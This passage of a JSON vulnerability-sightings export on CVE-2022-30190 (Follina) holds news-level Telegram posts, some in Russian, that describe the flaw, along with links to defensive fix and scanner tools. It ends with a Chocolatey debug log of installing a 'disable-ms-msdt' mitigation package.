CVE-2022-41082, CVE-2022-41040: ProxyNotShell\n8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs\n9. CVE-2022-26134: Atlassian Confluence RCE\n10. CVE-2022-30525: Zyxel RCE vulnerability", "creation_timestamp": "2024-10-11T03:03:25.000000Z"}, {"uuid": "c6a27db5-b108-4e76-a04c-b1674f5d7b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6184", "content": "#Whitepaper\n\"TA570 Qakbot (Qbot) tries CVE-2022-30190 (Follina) exploit\", 09.06.2022.", "creation_timestamp": "2022-06-12T13:31:01.000000Z"}, {"uuid": "0002c1b2-11a5-43e9-9e53-5484fb4b9efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6212", "content": "#Blue_Team_Techniques\nThese are two Python scripts compiled to quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n]-> Source Codes:\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code", "creation_timestamp": "2022-06-16T10:59:01.000000Z"}, {"uuid": "507d1b06-35bf-4394-abd4-cd97ebc18495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/6514", "content": "#Threat_Research\n1. LofyLife: malicious npm packages steal Discord tokens and bank card data\nhttps://securelist.com/lofylife-malicious-npm-packages/107014\n2. 
Follina exploit (CVE-2022-30190) fuels \"live-off-the-land\" attacks\nhttps://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks", "creation_timestamp": "2022-08-02T11:49:18.000000Z"}, {"uuid": "c2a7aa9d-97c7-48ff-b81a-d5d2d3366971", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6797", "content": "#tools\n#Blue_Team_Techniques\n1. FollinaScanner - A tool that scans files & directories for the Follina exploit (CVE-2022-30190)\nhttps://github.com/ErrorNoInternet/FollinaScanner\n2. On Challenges in Verifying Trusted Executable Files in Memory Forensics (+ .pdf)\nhttps://www.sciencedirect.com/science/article/pii/S2666281720300123?via%3Dihub\n]-> Microsoft Authenticode:\nhttps://reversea.me/index.php/authenticode-i-understanding-windows-authenticode", "creation_timestamp": "2022-09-14T11:01:01.000000Z"}, {"uuid": "1177c63b-f347-4d0c-974d-20aa2221727b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/binary_xor/567", "content": "#news \u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 Microsoft Office \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0451\u043d\u043d\u044b\u0445 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u0430\u044f Follina, 
\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0434\u0442\u044f\u043d\u0443\u0442\u044c \u0437\u043b\u043e\u0432\u0440\u0435\u0434 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c Powershell-\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e MSDT \u043f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u0430\u0439\u043b\u0430. \u0414\u043b\u044f \u044d\u0442\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u043d\u0435 \u043d\u0443\u0436\u043d\u044b \u043d\u0438 \u043c\u0430\u043a\u0440\u043e\u0441\u044b, \u043d\u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438. \u041d\u0435\u0442 \u0442\u043e\u043b\u043a\u0443 \u0438 \u043e\u0442 Windows Defender\u2019a. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, RTF-\u0444\u0430\u0439\u043b \u0434\u0430\u0436\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0435 \u043d\u0430\u0434\u043e: \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u0431\u0440\u0430\u0442\u044c \u0435\u0433\u043e, \u0435\u0441\u043b\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u0430\u043d\u0435\u043b\u044c \u043f\u0440\u0435\u0432\u044c\u044e. 
\u041f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 MS, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 2013.\n\n\u0421\u0430\u043c\u043e\u0435 \u0437\u0430\u043d\u044f\u0442\u043d\u043e\u0435, \u041c\u0435\u043b\u043a\u043e\u0441\u043e\u0444\u0442\u0443 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0435\u0449\u0451 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435, \u043d\u043e \u0442\u0438\u043a\u0435\u0442 \u0437\u0430\u043a\u0440\u044b\u043b\u0438, \u0442\u0430\u043a \u043a\u0430\u043a \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u0435\u0451 \u043d\u0435 \u0441\u043c\u043e\u0433\u043b\u0430. \u041d\u0443, \u0437\u0430\u0442\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u0441\u043c\u043e\u0433\u0443\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438. \u0417\u0430\u043f\u043e\u0437\u0434\u0430\u043b\u044b\u0439 \u043f\u0430\u0442\u0447 \u0443\u0436\u0435 \u043e\u0431\u0435\u0449\u0430\u043d, \u0430 \u043f\u043e\u043a\u0430 \u0432\u043e\u0440\u0434\u043e\u0432\u0441\u043a\u0438\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u043f\u043e\u0447\u0442\u0435 \u0434\u0430\u0436\u0435 \u043a\u0443\u0440\u0441\u043e\u0440\u043e\u043c \u0433\u043b\u0430\u0434\u0438\u0442\u044c \u043d\u0435 \u0441\u0442\u043e\u0438\u0442.\n\n@tomhunter", "creation_timestamp": "2023-02-08T23:37:32.000000Z"}, {"uuid": "6c49f5db-3505-42b2-a201-71cd75c63127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/LearnExploit/4351", "content": "1. Follina (CVE-2022-30190)\n\n2. Log4Shell (CVE-2021-44228)\n\n3. Spring4Shell (CVE-2022-22965)\n\n4. F5 BIG-IP (CVE-2022-1388)\n\n5. 
Google Chrome zero-day (CVE-2022-0609)\n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n\n10. Zyxel RCE vulnerability (CVE-2022-30525)\n\n#Exploit \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-04T10:02:38.000000Z"}, {"uuid": "cdcd5fa3-2484-4e25-8e84-0385e7a509c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/onfpowernemesis/3211", "content": "\u041d\u0435\u043c\u0435Z\u0438\u0434\u0430 (Telegram)\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u043e\u0432\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb (Windows Search) \u2014 CVE-2022-30190. \u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043e\u043a\u043d\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u0435\u0441\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c. 
\u0410 \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0442\u0430\u043a\u043e\u0435 \u043e\u043a\u043d\u043e, \u0436\u0435\u0440\u0442\u0432\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 Microsoft \u2014 MSDT, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u044b. \u041d\u043e \u0435\u0441\u043b\u0438 \u043f\u043e\u0434\u0441\u0443\u043d\u0443\u0442\u044c \u0435\u043c\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office, \u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0441\u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URI-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00absearch-ms\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c \u0438 HTML-\u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u043d\u0430 
\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0422\u0430\u043a\u0438\u0435 \u043f\u043e\u0438\u0441\u043a\u043e\u0432\u044b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u043d\u043e \u00ab\u041f\u043e\u0438\u0441\u043a Windows\u00bb \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0438\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438. \u041e\u043d \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b, \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c?\n\n\u0425\u0430\u043a\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office \u0438 \u043a\u0430\u043a-\u0442\u043e \u0435\u0433\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u2014 \u0447\u0435\u0440\u0435\u0437 \u0441\u0430\u0439\u0442\u044b,...\n\n\u041f\u0435\u0440\u0435\u0439\u0442\u0438 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u0441\u0442", "creation_timestamp": "2025-01-14T13:35:58.000000Z"}, {"uuid": "1a05a769-f2e1-4f3e-8b78-49209a0e04c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": 
"https://gist.github.com/choco-bot/a56235a3268e34cdfbe43b31aa0654d4", "content": "2026-06-09 18:35:48,359 4968 [DEBUG] - XmlConfiguration is now operational\n2026-06-09 18:35:48,641 4968 [DEBUG] - Adding new type 'CygwinService' for type 'IAlternativeSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,661 4968 [DEBUG] - Adding new type 'CygwinService' for type 'IInstallSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,661 4968 [DEBUG] - Adding new type 'PythonService' for type 'IAlternativeSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,672 4968 [DEBUG] - Adding new type 'PythonService' for type 'IListSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,672 4968 [DEBUG] - Adding new type 'PythonService' for type 'IInstallSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,720 4968 [DEBUG] - Adding new type 'PythonService' for type 'IUninstallSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,720 4968 [DEBUG] - Adding new type 'RubyGemsService' for type 'IAlternativeSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,734 4968 [DEBUG] - Adding new type 'RubyGemsService' for type 'IListSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,734 4968 [DEBUG] - Adding new type 'RubyGemsService' for type 'IInstallSourceRunner' from assembly 'choco'\n2026-06-09 18:35:48,750 4968 [DEBUG] - Adding new type 'SystemStateValidation' for type 'IValidation' from assembly 'choco'\n2026-06-09 18:35:48,750 4968 [DEBUG] - Adding new type 'CacheFolderLockdownValidation' for type 'IValidation' from assembly 'choco'\n2026-06-08 18:07:05,653 4968 [DEBUG] - Adding new type 'FrameWorkReferencesMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,667 4968 [DEBUG] - Adding new type 'IconMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,667 4968 [DEBUG] - Adding new type 'LicenseMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,687 4968 [DEBUG] - Adding new 
type 'PackageTypesMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,687 4968 [DEBUG] - Adding new type 'ReadmeMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,700 4968 [DEBUG] - Adding new type 'RepositoryMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,700 4968 [DEBUG] - Adding new type 'RequiredMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,700 4968 [DEBUG] - Adding new type 'RequireLicenseAcceptanceMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,715 4968 [DEBUG] - Adding new type 'ServicableMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,715 4968 [DEBUG] - Adding new type 'VersionMetadataRule' for type 'IMetadataRule' from assembly 'choco'\n2026-06-08 18:07:05,762 4968 [DEBUG] - Registering new command 'apikey' in assembly 'choco'\n2026-06-08 18:07:05,780 4968 [DEBUG] - Registering new command 'cache' in assembly 'choco'\n2026-06-08 18:07:05,780 4968 [DEBUG] - Registering new command 'config' in assembly 'choco'\n2026-06-08 18:07:05,780 4968 [DEBUG] - Registering new command 'export' in assembly 'choco'\n2026-06-08 18:07:05,794 4968 [DEBUG] - Registering new command 'feature' in assembly 'choco'\n2026-06-08 18:07:05,794 4968 [DEBUG] - Registering new command 'help' in assembly 'choco'\n2026-06-08 18:07:05,794 4968 [DEBUG] - Registering new command 'info' in assembly 'choco'\n2026-06-08 18:07:05,810 4968 [DEBUG] - Registering new command 'install' in assembly 'choco'\n2026-06-08 18:07:05,810 4968 [DEBUG] - Registering new command 'license' in assembly 'choco'\n2026-06-08 18:07:05,825 4968 [DEBUG] - Registering new command 'list' in assembly 'choco'\n2026-06-08 18:07:05,825 4968 [DEBUG] - Registering new command 'new' in assembly 'choco'\n2026-06-08 18:07:05,825 4968 [DEBUG] - Registering new command 'outdated' in assembly 'choco'\n2026-06-08 18:07:05,841 4968 
[DEBUG] - Registering new command 'pack' in assembly 'choco'\n2026-06-08 18:07:05,841 4968 [DEBUG] - Registering new command 'pin' in assembly 'choco'\n2026-06-08 18:07:05,841 4968 [DEBUG] - Registering new command 'push' in assembly 'choco'\n2026-06-08 18:07:05,856 4968 [DEBUG] - Registering new command 'rule' in assembly 'choco'\n2026-06-08 18:07:05,856 4968 [DEBUG] - Registering new command 'search' in assembly 'choco'\n2026-06-08 18:07:05,872 4968 [DEBUG] - Registering new command 'source' in assembly 'choco'\n2026-06-08 18:07:05,892 4968 [DEBUG] - Registering new command 'support' in assembly 'choco'\n2026-06-08 18:07:05,903 4968 [DEBUG] - Registering new command 'template' in assembly 'choco'\n2026-06-08 18:07:05,903 4968 [DEBUG] - Registering new command 'uninstall' in assembly 'choco'\n2026-06-08 18:07:05,918 4968 [DEBUG] - Registering new command 'unpackself' in assembly 'choco'\n2026-06-08 18:07:05,918 4968 [DEBUG] - Registering new command 'upgrade' in assembly 'choco'\n2026-06-08 18:07:06,434 4968 [INFO ] - ============================================================\n2026-06-08 18:07:07,011 4968 [INFO ] - Chocolatey v2.7.2\n2026-06-08 18:07:07,044 4968 [DEBUG] - Chocolatey is running on Windows v 10.0.17763.0\n2026-06-08 18:07:07,059 4968 [DEBUG] - Attempting to delete file \"C:/ProgramData/chocolatey/choco.exe.old\".\n2026-06-08 18:07:07,059 4968 [DEBUG] - Attempting to delete file \"C:\\ProgramData\\chocolatey\\choco.exe.old\".\n2026-06-08 18:07:07,106 4968 [DEBUG] - Command line: \"C:\\ProgramData\\chocolatey\\choco.exe\" install disable-ms-msdt --version 1.0.0 -fdvy --execution-timeout=2700 --allow-downgrade\n2026-06-08 18:07:07,106 4968 [DEBUG] - Received arguments: install disable-ms-msdt --version 1.0.0 -fdvy --execution-timeout=2700 --allow-downgrade\n2026-06-08 18:07:07,372 4968 [DEBUG] - RemovePendingPackagesTask is now ready and waiting for PreRunMessage.\n2026-06-08 18:07:07,417 4968 [DEBUG] - Sending message 'PreRunMessage' out if there 
are subscribers...\n2026-06-08 18:07:07,465 4968 [DEBUG] - [Pending] Removing all pending packages that should not be considered installed...\n2026-06-08 18:07:07,823 4968 [DEBUG] - Performing validation checks.\n2026-06-08 18:07:07,857 4968 [DEBUG] - Global Configuration Validation Checks:\n2026-06-08 18:07:07,857 4968 [DEBUG] -  - Package Exit Code / Exit On Reboot = Checked\n2026-06-08 18:07:07,889 4968 [DEBUG] - System State Validation Checks:\n2026-06-08 18:07:07,903 4968 [DEBUG] -  Reboot Requirement Checks:\n2026-06-08 18:07:07,919 4968 [DEBUG] -  - Pending Computer Rename = Checked\n2026-06-08 18:07:07,935 4968 [DEBUG] -  - Pending Component Based Servicing = Checked\n2026-06-08 18:07:07,935 4968 [DEBUG] -  - Pending Windows Auto Update = Checked\n2026-06-08 18:07:07,935 4968 [DEBUG] -  - Pending File Rename Operations = Ignored\n2026-06-08 18:07:07,949 4968 [DEBUG] -  - Pending Windows Package Installer = Checked\n2026-06-08 18:07:07,949 4968 [DEBUG] -  - Pending Windows Package Installer SysWow64 = Checked\n2026-06-08 18:07:07,966 4968 [DEBUG] - Cache Folder Lockdown Checks:\n2026-06-08 18:07:07,980 4968 [DEBUG] -  - Elevated State = Checked\n2026-06-08 18:07:07,980 4968 [DEBUG] -  - Folder Exists = Checked\n2026-06-08 18:07:08,013 4968 [DEBUG] -  - Folder lockdown = Checked\n2026-06-08 18:07:08,033 4968 [INFO ] - 3 validations performed. 3 success(es), 0 warning(s), and 0 error(s).\n2026-06-08 18:07:08,115 4968 [DEBUG] - The source 'c:\\cached-packages;https://community.chocolatey.org/api/v2/' evaluated to a 'normal' source type\n2026-06-08 18:07:08,120 4968 [DEBUG] - \nNOTE: Hiding sensitive configuration data! 
Please double and triple\n check to be sure no sensitive data is shown, especially if copying\n output to a gist for review.\n2026-06-08 18:07:08,198 4968 [DEBUG] - Configuration: CommandName='install'|\nCacheLocation='C:\\Users\\vagrant\\AppData\\Local\\Temp\\chocolatey'|\nCommandExecutionTimeoutSeconds='2700'|WebRequestTimeoutSeconds='30'|\nSources='c:\\cached-packages;https://community.chocolatey.org/api/v2/'|\nSourceType='normal'|IncludeConfiguredSources='False'|\nShowOnlineHelp='False'|Debug='True'|Verbose='True'|Trace='False'|\nForce='True'|Noop='False'|HelpRequested='False'|\nUnsuccessfulParsing='False'|RegularOutput='True'|QuietOutput='False'|\nPromptForConfirmation='False'|DisableCompatibilityChecks='False'|\nAcceptLicense='True'|AllowUnofficialBuild='False'|\nInput='disable-ms-msdt'|Version='1.0.0'|AllVersions='False'|\nSkipPackageInstallProvider='False'|SkipHookScripts='False'|\nPackageNames='disable-ms-msdt'|Prerelease='False'|ForceX86='False'|\nOverrideArguments='False'|NotSilent='False'|\nApplyPackageParametersToDependencies='False'|\nApplyInstallArgumentsToDependencies='False'|IgnoreDependencies='False'|\nUseHttpCache='True'|CacheExpirationInMinutes='30'|\nAllowDowngrade='True'|\nForceDependencies='False'|PinPackage='False'|IncludeHeaders='False'|\nInformation.PlatformType='Windows'|\nInformation.PlatformVersion='10.0.17763.0'|\nInformation.PlatformName='Windows Server 2019'|\nInformation.ChocolateyVersion='2.7.2.0'|\nInformation.ChocolateyProductVersion='2.7.2'|\nInformation.FullName='choco, Version=2.7.2.0, Culture=neutral, 
PublicKeyToken=79d02ea9cad655eb'|\n\nInformation.Is64BitOperatingSystem='True'|\nInformation.Is64BitProcess='True'|Information.IsInteractive='False'|\nInformation.UserName='vagrant'|\nInformation.UserDomainName='WIN-D074OMMMISC'|\nInformation.IsUserAdministrator='True'|\nInformation.IsUserSystemAccount='False'|\nInformation.IsUserRemoteDesktop='False'|\nInformation.IsUserRemote='True'|\nInformation.IsProcessElevated='True'|\nInformation.IsLicensedVersion='False'|\nInformation.IsLicensedAssemblyLoaded='False'|\nInformation.LicenseType='Foss'|\nInformation.CurrentDirectory='C:\\Users\\vagrant'|\nFeatures.AutoUninstaller='True'|Features.ChecksumFiles='True'|\nFeatures.AllowEmptyChecksums='False'|\nFeatures.AllowEmptyChecksumsSecure='True'|\nFeatures.FailOnAutoUninstaller='False'|\nFeatures.FailOnStandardError='False'|Features.UsePowerShellHost='True'|\nFeatures.LogEnvironmentValues='True'|Features.LogWithoutColor='False'|\nFeatures.VirusCheck='False'|\nFeatures.FailOnInvalidOrMissingLicense='False'|\nFeatures.IgnoreInvalidOptionsSwitches='True'|\nFeatures.UsePackageExitCodes='True'|\nFeatures.UseEnhancedExitCodes='False'|\nFeatures.UseFipsCompliantChecksums='False'|\nFeatures.ShowNonElevatedWarnings='True'|\nFeatures.ShowDownloadProgress='False'|\nFeatures.StopOnFirstPackageFailure='False'|\nFeatures.UseRememberedArgumentsForUpgrades='False'|\nFeatures.IgnoreUnfoundPackagesOnUpgradeOutdated='False'|\nFeatures.SkipPackageUpgradesWhenNotInstalled='False'|\nFeatures.RemovePackageInformationOnUninstall='False'|\nFeatures.ExitOnRebootDetected='False'|\nFeatures.LogValidationResultsOnWarnings='True'|\nFeatures.UsePackageRepositoryOptimizations='True'|\nFeatures.UsePackageHashValidation='False'|\nListCommand.LocalOnly='False'|\nListCommand.IdOnly='False'|ListCommand.IncludeRegistryPrograms='False'|\nListCommand.PageSize='25'|ListCommand.Exact='False'|\nListCommand.ByIdOnly='False'|ListCommand.ByTagOnly='False'|\nListCommand.IdStartsWith='False'|ListCommand.IgnorePinned='False
'|\nListCommand.OrderBy='Id'|ListCommand.OrderByPopularity='False'|\nListCommand.ApprovedOnly='False'|\nListCommand.DownloadCacheAvailable='False'|\nListCommand.NotBroken='False'|\nListCommand.IncludeVersionOverrides='False'|\nListCommand.ExplicitPageSize='False'|\nListCommand.ExplicitSource='False'|\nUpgradeCommand.FailOnUnfound='False'|\nUpgradeCommand.FailOnNotInstalled='False'|\nUpgradeCommand.NotifyOnlyAvailableUpgrades='False'|\nUpgradeCommand.ExcludePrerelease='False'|\nUpgradeCommand.IgnorePinned='False'|\nNewCommand.AutomaticPackage='False'|\nNewCommand.UseOriginalTemplate='False'|SourceCommand.Command='unknown'|\nSourceCommand.Priority='0'|SourceCommand.BypassProxy='False'|\nSourceCommand.AllowSelfService='False'|\nSourceCommand.VisibleToAdminsOnly='False'|\nFeatureCommand.Command='unknown'|ConfigCommand.Command='Unknown'|\nApiKeyCommand.Command='Unknown'|PinCommand.Command='Unknown'|\nLicenseCommand.Command='Unknown'|OutdatedCommand.IgnorePinned='False'|\nExportCommand.IncludeVersionNumbers='False'|Proxy.BypassOnLocal='True'|\nTemplateCommand.Command='unknown'|CacheCommand.Command='Unknown'|\nCacheCommand.RemoveExpiredItemsOnly='False'|\n2026-06-08 18:07:08,215 4968 [DEBUG] - _ Chocolatey:ChocolateyInstallCommand - Normal Run Mode _\n2026-06-08 18:07:08,231 4968 [INFO ] - Installing the following packages:\n2026-06-08 18:07:08,250 4968 [INFO ] - disable-ms-msdt\n2026-06-08 18:07:08,250 4968 [INFO ] - By installing, you accept licenses for the packages.\n2026-06-08 18:07:08,296 4968 [DEBUG] - Current environment values (may contain sensitive data):\n2026-06-08 18:07:08,296 4968 [DEBUG] -   * 'Path'='C:\\Users\\vagrant\\AppData\\Local\\Microsoft\\WindowsApps;' ('User')\n2026-06-08 18:07:08,296 4968 [DEBUG] -   * 'TEMP'='C:\\Users\\vagrant\\AppData\\Local\\Temp' 